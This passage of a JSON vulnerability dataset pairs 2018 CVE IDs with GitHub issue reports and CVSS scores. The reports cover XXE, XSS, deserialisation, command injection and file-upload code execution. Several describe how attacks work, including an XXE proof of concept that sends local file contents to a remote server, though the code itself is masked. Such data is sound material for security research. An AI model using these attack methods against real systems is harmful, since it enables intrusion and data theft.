lexer_next PATHTAG NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f1b NUMBERTAG d8a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffc6d2ca NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in aql_parse PATHTAG This frame has NUMBERTAG object(s NUMBERTAG token NUMBERTAG le NUMBERTAG name NUMBERTAG alue' APITAG NUMBERTAG da NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f4 f3 f3 f3 f NUMBERTAG da NUMBERTAG f1 f1 f1 f NUMBERTAG da NUMBERTAG a NUMBERTAG da NUMBERTAG b NUMBERTAG f4 f4 f4 f3 f NUMBERTAG da NUMBERTAG c0: f3 f NUMBERTAG da NUMBERTAG d NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  17338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17339. "severity": "CRITICAL",
  17340. "baseScore": 9.8,
  17341. "impactScore": 5.9,
  17342. "exploitabilityScore": 3.9
  17343. },
  17344. {
  17345. "CVE_ID": "CVE-2018-1000805",
  17346. "Issue_Url_old": "https://github.com/paramiko/paramiko/issues/1283",
  17347. "Issue_Url_new": "https://github.com/paramiko/paramiko/issues/1283",
  17348. "Repo_new": "paramiko/paramiko",
  17349. "Issue_Created_At": "2018-09-06T22:55:57Z",
  17350. "description": "CVE PENDING] Server side auth vulnerability [DESC TK]. Placeholder for a not yet public security vulnerability on Paramiko's server side ( NOT client side), as reported by Daniel Hoffman of [usd AG URLTAG . I was emailed by the above on APITAG and (due to being on vacation at the time) was able to review the initial information on today's day APITAG Daniel submitted the following: sample vanilla enough server side code loop (using standard/public API members with no additions besides logging and specification of expected auth mechanisms) sample client side code which exploits the vulnerability in the server (TK) detailed explanation of why the exploit works, with references to parts of Paramiko's server side code recommended fix At time of writing, I have done a cursory read of the code snippets & explanation, and confirmed that the sample code does appear to exhibit the described exploit. Next steps for me: [ ] take up Daniel on his offer to create a CVE; less work for me, but also, a security company has more experience with that process than I do, namely \"any at all\" [ ] double check the details of the vulnerability so that I understand it more deeply [ ] consider whether the suggested fix is valid (it has to do with Paramiko's reuse of code across client/server use cases) [ ] confirm exploit & fix are both valid to NUMBERTAG APITAG (at present I am still considering NUMBERTAG to be pseudo LTS and getting bugfixes, though this will soon cease) and up [ ] test, patch, confirm [ ] changelog entry [ ] merge up to all branches [ ] push & release at once so fix is live [ ] update this ticket with my notes/real description [ ] send a security notice out via Tidelift",
  17351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17352. "severity": "HIGH",
  17353. "baseScore": 8.8,
  17354. "impactScore": 5.9,
  17355. "exploitabilityScore": 2.8
  17356. },
  17357. {
  17358. "CVE_ID": "CVE-2018-1000809",
  17359. "Issue_Url_old": "https://github.com/privacyidea/privacyidea/issues/1227",
  17360. "Issue_Url_new": "https://github.com/privacyidea/privacyidea/issues/1227",
  17361. "Repo_new": "privacyidea/privacyidea",
  17362. "Issue_Created_At": "2018-09-07T09:02:49Z",
  17363. "description": "Failcounter increments on every token without a PIN when the user= parameter just has a APITAG . The failcounter increments on every token without a PIN when the user= parameter just has a APITAG . In our case this resulted basically in a denial of service of our two factor authentication system, as by default any fail counter over NUMBERTAG will lock the token out. What did you try to do? Have tokens without PIN, for example in our setup we have HOTP, TOTP and VASCO tokens without PIN. Then a request with a user= APITAG will increment the failcounter for all these tokens. For example with httpie: APITAG Or with curl: APITAG This will return: \" wrong otp value \" and increment all failcounters by NUMBERTAG What outcome did you expect? Since the user= parameter does not match any user in privacyidea with a token, i was expecting it to just deny/drop the request. What outcome did you experience? All tokens verifications were blocked because all failcounters where incremented to their current max of NUMBERTAG And any valid check would output the following \"matching NUMBERTAG tokens, Failcounter exceeded\" . Configuration Tested on APITAG NUMBERTAG and NUMBERTAG Debian stable, virtualenv. Extra information I'm suspecting something wrong in the logic of PATHTAG L NUMBERTAG URLTAG , so that this is matching all tokens without a PIN. ERRORTAG",
  17364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  17365. "severity": "HIGH",
  17366. "baseScore": 7.5,
  17367. "impactScore": 3.6,
  17368. "exploitabilityScore": 3.9
  17369. },
  17370. {
  17371. "CVE_ID": "CVE-2018-1000811",
  17372. "Issue_Url_old": "https://github.com/bludit/bludit/issues/812",
  17373. "Issue_Url_new": "https://github.com/bludit/bludit/issues/812",
  17374. "Repo_new": "bludit/bludit",
  17375. "Issue_Created_At": "2018-10-02T18:30:47Z",
  17376. "description": "Arbitrary File Upload Security. Hi There, I was trying the application for a while and noticed that a regular user ( Editor role ) can upload arbitrary file, in this case a PHP file. By then he can run remote PHP command on server context. Is it OK to describe the vulnerability here ? or you prefer to send it in private ? Thanks.",
  17377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17378. "severity": "HIGH",
  17379. "baseScore": 8.8,
  17380. "impactScore": 5.9,
  17381. "exploitabilityScore": 2.8
  17382. },
  17383. {
  17384. "CVE_ID": "CVE-2018-1000814",
  17385. "Issue_Url_old": "https://github.com/aio-libs/aiohttp-session/issues/325",
  17386. "Issue_Url_new": "https://github.com/aio-libs/aiohttp-session/issues/325",
  17387. "Repo_new": "aio-libs/aiohttp-session",
  17388. "Issue_Created_At": "2018-10-08T19:29:39Z",
  17389. "description": "Improper Session Expiration in storages with no inherent expiration. Storages that lack inherent data expiration APITAG APITAG (out of scope, it's inherently insecure) APITAG appear to do improper Session Expiration. A user that has obtained a legitimate session, can do a replay attack recreating his / her cookie (with the same value as the original) thus defeating the purpose of cookie expiry. This impacts security in the sense that it increases the attack window for session attacks practically providing infinite lifespan tokens. This falls under OWASP's OTG SESS NUMBERTAG URLTAG APITAG Session Timeout) test and more specifically under the 'ensuring that it is not possible to \u201creuse\u201d the same session' clause. APITAG Using a slight variation of APITAG : ERRORTAG And a client that logs in, saves the value of the cookie and re creates it after expiry: ERRORTAG Running both will result in the following output on the client: ERRORTAG The above shows that the expired session was successfully used simply by re creating the cookie. Remedy For fernet, documentation URLTAG indicates that there is a ttl option to decrypt that should suffice. I am preparing a PR for this. Unfortunately I couldn't find anything related for APITAG My only though on this is to add the created time in the message itself for APITAG and check it on load_session (maybe issue a warning if an expired token was presented). I would like some feedback / thoughts on this.",
  17390. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  17391. "severity": "MEDIUM",
  17392. "baseScore": 6.5,
  17393. "impactScore": 3.6,
  17394. "exploitabilityScore": 2.8
  17395. },
  17396. {
  17397. "CVE_ID": "CVE-2018-1000815",
  17398. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/15232",
  17399. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/15232",
  17400. "Repo_new": "brave/browser-laptop",
  17401. "Issue_Created_At": "2018-09-26T20:35:59Z",
  17402. "description": "[hackerone NUMBERTAG noscript issue. URLTAG verified in latest release",
  17403. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
  17404. "severity": "MEDIUM",
  17405. "baseScore": 4.3,
  17406. "impactScore": 1.4,
  17407. "exploitabilityScore": 2.8
  17408. },
  17409. {
  17410. "CVE_ID": "CVE-2018-1000816",
  17411. "Issue_Url_old": "https://github.com/grafana/grafana/issues/13667",
  17412. "Issue_Url_new": "https://github.com/grafana/grafana/issues/13667",
  17413. "Repo_new": "grafana/grafana",
  17414. "Issue_Created_At": "2018-10-14T14:55:27Z",
  17415. "description": "stored xss in grafana query editor. Dear Grafana Team \u2013 I have found a persistent xss in Grafana's query editor for Graphite and Influxdb. The xss is triggered when clicking the field in the query editor's \"FROM\" row in which the payload NUMBERTAG was previously inserted. I checked this vulnerability version NUMBERTAG and version NUMBERTAG both on Ubuntu NUMBERTAG I attached this short screencast to make it easy to reproduce the behaviour APITAG Grafana APITAG URLTAG NUMBERTAG APITAG",
  17416. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17417. "severity": "MEDIUM",
  17418. "baseScore": 5.4,
  17419. "impactScore": 2.7,
  17420. "exploitabilityScore": 2.3
  17421. },
  17422. {
  17423. "CVE_ID": "CVE-2018-1000817",
  17424. "Issue_Url_old": "https://github.com/grails/grails-core/issues/11068",
  17425. "Issue_Url_new": "https://github.com/grails/grails-core/issues/11068",
  17426. "Repo_new": "grails/grails-core",
  17427. "Issue_Created_At": "2018-08-17T09:45:15Z",
  17428. "description": "File reading vulnerability. Hi, grails has a file reading vulnerability which can read source code (java bytecode) of affected applications. This flaw needs the grails packed to war, and the application is running on the jetty. Reproduce NUMBERTAG Create a helloworld application and a helloworld controller NUMBERTAG Modify APITAG line NUMBERTAG from APITAG to APITAG NUMBERTAG Build a war file NUMBERTAG Deploy the application to jetty NUMBERTAG Send a crafted request: APITAG . Expected Behaviour ERRORTAG or NUMBERTAG Actual Behaviour FILETAG Environment Information Operating System : Windows Grails Version: the latest version JDK Version NUMBERTAG",
  17429. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  17430. "severity": "HIGH",
  17431. "baseScore": 7.5,
  17432. "impactScore": 3.6,
  17433. "exploitabilityScore": 3.9
  17434. },
  17435. {
  17436. "CVE_ID": "CVE-2018-1000821",
  17437. "Issue_Url_old": "https://github.com/mkulesh/microMathematics/issues/79",
  17438. "Issue_Url_new": "https://github.com/mkulesh/micromathematics/issues/79",
  17439. "Repo_new": "mkulesh/micromathematics",
  17440. "Issue_Created_At": "2018-09-29T09:32:28Z",
  17441. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
  17442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17443. "severity": "CRITICAL",
  17444. "baseScore": 10.0,
  17445. "impactScore": 6.0,
  17446. "exploitabilityScore": 3.9
  17447. },
  17448. {
  17449. "CVE_ID": "CVE-2018-1000822",
  17450. "Issue_Url_old": "https://github.com/codelibs/fess/issues/1851",
  17451. "Issue_Url_new": "https://github.com/codelibs/fess/issues/1851",
  17452. "Repo_new": "codelibs/fess",
  17453. "Issue_Created_At": "2018-09-29T09:59:12Z",
  17454. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
  17455. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17456. "severity": "CRITICAL",
  17457. "baseScore": 10.0,
  17458. "impactScore": 6.0,
  17459. "exploitabilityScore": 3.9
  17460. },
  17461. {
  17462. "CVE_ID": "CVE-2018-1000823",
  17463. "Issue_Url_old": "https://github.com/eXist-db/exist/issues/2180",
  17464. "Issue_Url_new": "https://github.com/exist-db/exist/issues/2180",
  17465. "Repo_new": "exist-db/exist",
  17466. "Issue_Created_At": "2018-09-29T10:37:37Z",
  17467. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG The insecure XML parsing is used within the REST server in the following code: URLTAG",
  17468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17469. "severity": "CRITICAL",
  17470. "baseScore": 10.0,
  17471. "impactScore": 6.0,
  17472. "exploitabilityScore": 3.9
  17473. },
  17474. {
  17475. "CVE_ID": "CVE-2018-1000824",
  17476. "Issue_Url_old": "https://github.com/MegaMek/megamek/issues/1162",
  17477. "Issue_Url_new": "https://github.com/megamek/megamek/issues/1162",
  17478. "Repo_new": "megamek/megamek",
  17479. "Issue_Created_At": "2018-09-29T13:10:17Z",
  17480. "description": "Object Deserialisation Vulnerability in APITAG The Issue Object Deserialization Injection attacks utilise overly trusted user controlled input, passed to deserialisation functions. The deserialisation of objects can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code within the APITAG project, where the user input is passed into the deserialisation function: URLTAG The above code can be manipulated by specially crafted network packets.",
  17481. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17482. "severity": "CRITICAL",
  17483. "baseScore": 9.8,
  17484. "impactScore": 5.9,
  17485. "exploitabilityScore": 3.9
  17486. },
  17487. {
  17488. "CVE_ID": "CVE-2018-1000825",
  17489. "Issue_Url_old": "https://github.com/FreeCol/freecol/issues/26",
  17490. "Issue_Url_new": "https://github.com/freecol/freecol/issues/26",
  17491. "Repo_new": "freecol/freecol",
  17492. "Issue_Created_At": "2018-09-29T13:28:33Z",
  17493. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG Remediation URLTAG",
  17494. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17495. "severity": "CRITICAL",
  17496. "baseScore": 10.0,
  17497. "impactScore": 6.0,
  17498. "exploitabilityScore": 3.9
  17499. },
  17500. {
  17501. "CVE_ID": "CVE-2018-1000826",
  17502. "Issue_Url_old": "https://github.com/microweber/microweber/issues/489",
  17503. "Issue_Url_new": "https://github.com/microweber/microweber/issues/489",
  17504. "Repo_new": "microweber/microweber",
  17505. "Issue_Created_At": "2018-09-29T14:47:53Z",
  17506. "description": "XSS in FILETAG . The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occurred The code below displays the user controlled variable without sufficient sanitisation: URLTAG",
  17507. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17508. "severity": "MEDIUM",
  17509. "baseScore": 6.1,
  17510. "impactScore": 2.7,
  17511. "exploitabilityScore": 2.8
  17512. },
  17513. {
  17514. "CVE_ID": "CVE-2018-1000827",
  17515. "Issue_Url_old": "https://github.com/nightflyza/Ubilling/issues/330",
  17516. "Issue_Url_new": "https://github.com/nightflyza/ubilling/issues/330",
  17517. "Repo_new": "nightflyza/ubilling",
  17518. "Issue_Created_At": "2018-09-29T14:53:07Z",
  17519. "description": "Object Deserialisation Vulnerability in FILETAG . The Issue Object Deserialization Injection attacks utilise overly trusted user controlled input, passed to deserialisation functions. The deserialisation of objects can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code where the user input is passed into the deserialisation function: URLTAG",
  17520. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17521. "severity": "CRITICAL",
  17522. "baseScore": 9.8,
  17523. "impactScore": 5.9,
  17524. "exploitabilityScore": 3.9
  17525. },
  17526. {
  17527. "CVE_ID": "CVE-2018-1000828",
  17528. "Issue_Url_old": "https://github.com/frostwire/frostwire/issues/829",
  17529. "Issue_Url_new": "https://github.com/frostwire/frostwire/issues/829",
  17530. "Repo_new": "frostwire/frostwire",
  17531. "Issue_Created_At": "2018-09-29T15:04:55Z",
  17532. "description": "XXE in APITAG via Man in the Middle APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG An attacker can Man in the Middle APITAG the HTTP call to the URL below: URLTAG Remediation URLTAG",
  17533. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17534. "severity": "CRITICAL",
  17535. "baseScore": 9.0,
  17536. "impactScore": 6.0,
  17537. "exploitabilityScore": 2.2
  17538. },
  17539. {
  17540. "CVE_ID": "CVE-2018-1000829",
  17541. "Issue_Url_old": "https://github.com/dmsl/anyplace/issues/263",
  17542. "Issue_Url_new": "https://github.com/dmsl/anyplace/issues/263",
  17543. "Repo_new": "dmsl/anyplace",
  17544. "Issue_Created_At": "2018-09-30T02:47:20Z",
  17545. "description": "XXE in APITAG via Man in the Middle APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG An attacker can Man in the Middle APITAG the HTTP call to the URL below: URLTAG",
  17546. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17547. "severity": "CRITICAL",
  17548. "baseScore": 9.0,
  17549. "impactScore": 6.0,
  17550. "exploitabilityScore": 2.2
  17551. },
  17552. {
  17553. "CVE_ID": "CVE-2018-1000830",
  17554. "Issue_Url_old": "https://github.com/goxr3plus/XR3Player/issues/9",
  17555. "Issue_Url_new": "https://github.com/goxr3plus/xr3player/issues/9",
  17556. "Repo_new": "goxr3plus/xr3player",
  17557. "Issue_Created_At": "2018-10-24T11:05:34Z",
  17558. "description": "XXE in Playlist Parsers. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of documentbuilderfactory without securely disabling entities: URLTAG Remediation URLTAG",
  17559. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17560. "severity": "CRITICAL",
  17561. "baseScore": 10.0,
  17562. "impactScore": 6.0,
  17563. "exploitabilityScore": 3.9
  17564. },
  17565. {
  17566. "CVE_ID": "CVE-2018-1000831",
  17567. "Issue_Url_old": "https://github.com/k9mail/k-9/issues/3681",
  17568. "Issue_Url_new": "https://github.com/thundernest/k-9/issues/3681",
  17569. "Repo_new": "thundernest/k-9",
  17570. "Issue_Created_At": "2018-10-24T11:12:53Z",
  17571. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of saxparserfactory without securely disabling entities: URLTAG Remediation URLTAG",
  17572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17573. "severity": "CRITICAL",
  17574. "baseScore": 10.0,
  17575. "impactScore": 6.0,
  17576. "exploitabilityScore": 3.9
  17577. },
  17578. {
  17579. "CVE_ID": "CVE-2018-1000832",
  17580. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2271",
  17581. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2271",
  17582. "Repo_new": "zoneminder/zoneminder",
  17583. "Issue_Created_At": "2018-10-24T11:29:17Z",
  17584. "description": "Command Injection in FILETAG . The Issue Command injection is an attack which uses overly trusting user controlled input, when performing operating system commands from within the application. This allows an attacker to perform unauthorised operating system commands on the target server. Where the Issue Occurred URLTAG Remediation URLTAG",
  17585. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17586. "severity": "CRITICAL",
  17587. "baseScore": 9.8,
  17588. "impactScore": 5.9,
  17589. "exploitabilityScore": 3.9
  17590. },
  17591. {
  17592. "CVE_ID": "CVE-2018-1000833",
  17593. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2272",
  17594. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2272",
  17595. "Repo_new": "zoneminder/zoneminder",
  17596. "Issue_Created_At": "2018-10-24T11:31:14Z",
  17597. "description": "Command Injection in FILETAG . The Issue Command injection is an attack which uses overly trusting user controlled input, when performing operating system commands from within the application. This allows an attacker to perform unauthorised operating system commands on the target server. Where the Issue Occurred: URLTAG Remediation URLTAG",
  17598. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17599. "severity": "CRITICAL",
  17600. "baseScore": 9.8,
  17601. "impactScore": 5.9,
  17602. "exploitabilityScore": 3.9
  17603. },
  17604. {
  17605. "CVE_ID": "CVE-2018-1000834",
  17606. "Issue_Url_old": "https://github.com/runelite/runelite/issues/6160",
  17607. "Issue_Url_new": "https://github.com/runelite/runelite/issues/6160",
  17608. "Repo_new": "runelite/runelite",
  17609. "Issue_Created_At": "2018-10-24T11:43:43Z",
  17610. "description": "XXE via Man in the Middle in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: Insecure XML parsers are used below: URLTAG Communication over HTTP may allow an attacker to edit a server's response and perform XXE attacks. The HTTP URL is displayed below: URLTAG Remediation Perform communications over HTTPS",
  17611. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17612. "severity": "CRITICAL",
  17613. "baseScore": 9.0,
  17614. "impactScore": 6.0,
  17615. "exploitabilityScore": 2.2
  17616. },
  17617. {
  17618. "CVE_ID": "CVE-2018-1000835",
  17619. "Issue_Url_old": "https://github.com/Kunzisoft/KeePassDX/issues/200",
  17620. "Issue_Url_new": "https://github.com/kunzisoft/keepassdx/issues/200",
  17621. "Repo_new": "kunzisoft/keepassdx",
  17622. "Issue_Created_At": "2018-10-24T11:48:44Z",
  17623. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: URLTAG Remediation URLTAG",
  17624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17625. "severity": "CRITICAL",
  17626. "baseScore": 10.0,
  17627. "impactScore": 6.0,
  17628. "exploitabilityScore": 3.9
  17629. },
  17630. {
  17631. "CVE_ID": "CVE-2018-1000836",
  17632. "Issue_Url_old": "https://github.com/Bedework/bw-calendar-engine/issues/3",
  17633. "Issue_Url_new": "https://github.com/bedework/bw-calendar-engine/issues/3",
  17634. "Repo_new": "bedework/bw-calendar-engine",
  17635. "Issue_Created_At": "2018-10-24T11:54:22Z",
  17636. "description": "XXE via APITAG / Malicious Server in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred URLTAG Remediation URLTAG",
  17637. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17638. "severity": "CRITICAL",
  17639. "baseScore": 9.0,
  17640. "impactScore": 6.0,
  17641. "exploitabilityScore": 2.2
  17642. },
  17643. {
  17644. "CVE_ID": "CVE-2018-1000837",
  17645. "Issue_Url_old": "https://github.com/ObeoNetwork/UML-Designer/issues/1035",
  17646. "Issue_Url_new": "https://github.com/obeonetwork/uml-designer/issues/1035",
  17647. "Repo_new": "obeonetwork/uml-designer",
  17648. "Issue_Created_At": "2018-10-24T11:58:27Z",
  17649. "description": "XXE in APITAG via FILETAG file. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred URLTAG Remediation URLTAG",
  17650. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17651. "severity": "CRITICAL",
  17652. "baseScore": 10.0,
  17653. "impactScore": 6.0,
  17654. "exploitabilityScore": 3.9
  17655. },
  17656. {
  17657. "CVE_ID": "CVE-2018-1000838",
  17658. "Issue_Url_old": "https://github.com/sleuthkit/autopsy/issues/4236",
  17659. "Issue_Url_new": "https://github.com/sleuthkit/autopsy/issues/4236",
  17660. "Repo_new": "sleuthkit/autopsy",
  17661. "Issue_Created_At": "2018-10-25T04:59:50Z",
  17662. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: URLTAG Remediation URLTAG",
  17663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17664. "severity": "CRITICAL",
  17665. "baseScore": 10.0,
  17666. "impactScore": 6.0,
  17667. "exploitabilityScore": 3.9
  17668. },
  17669. {
  17670. "CVE_ID": "CVE-2018-1000839",
  17671. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1223",
  17672. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1223",
  17673. "Repo_new": "librehealthio/lh-ehr",
  17674. "Issue_Created_At": "2018-08-11T06:30:11Z",
  17675. "description": "Security issue: Remote code execution via user picture upload. The Issue Arbitrary file upload vulnerability allowing any user who can set profile pictures to be able to execute code on the hosting system. In lh ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this. Issue location Occurs at URLTAG POC: ERRORTAG CODETAG",
  17676. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17677. "severity": "HIGH",
  17678. "baseScore": 8.8,
  17679. "impactScore": 5.9,
  17680. "exploitabilityScore": 2.8
  17681. },
  17682. {
  17683. "CVE_ID": "CVE-2018-1000840",
  17684. "Issue_Url_old": "https://github.com/processing/processing/issues/5706",
  17685. "Issue_Url_new": "https://github.com/processing/processing/issues/5706",
  17686. "Repo_new": "processing/processing",
  17687. "Issue_Created_At": "2018-11-13T15:42:43Z",
  17688. "description": "XXE in APITAG . Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data since it allows arbitrary file inclusion in the XML and the automated execution of HTTP request (which can be used to exfiltrate the included data) during the parsing of the XML. Steps to reproduce Example Processing script CODETAG Example XML file CODETAG Example remote DTD (as stored at the url referenced above) CODETAG Further clarification The proof of concept provided above retrieves from the remote server the DTD specification. During the execution of APITAG the DTD is then parsed, reading in the example the content of PATHTAG The content of the file is than transmitted through an HTTP request (row NUMBERTAG of the DTD) to the remote server, that returns the content of $_REQUEST, providing the console output. Remediation URLTAG URLTAG",
  17689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  17690. "severity": "MEDIUM",
  17691. "baseScore": 6.5,
  17692. "impactScore": 3.6,
  17693. "exploitabilityScore": 2.8
  17694. },
  17695. {
  17696. "CVE_ID": "CVE-2018-1000842",
  17697. "Issue_Url_old": "https://github.com/asteinhauser/fat_free_crm/issues/1",
  17698. "Issue_Url_new": "https://github.com/asteinhauser/fat_free_crm/issues/1",
  17699. "Repo_new": "asteinhauser/fat_free_crm",
  17700. "Issue_Created_At": "2018-10-26T23:58:10Z",
  17701. "description": "Context sensitive XSS discovery. FILETAG",
  17702. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17703. "severity": "MEDIUM",
  17704. "baseScore": 6.1,
  17705. "impactScore": 2.7,
  17706. "exploitabilityScore": 2.8
  17707. },
  17708. {
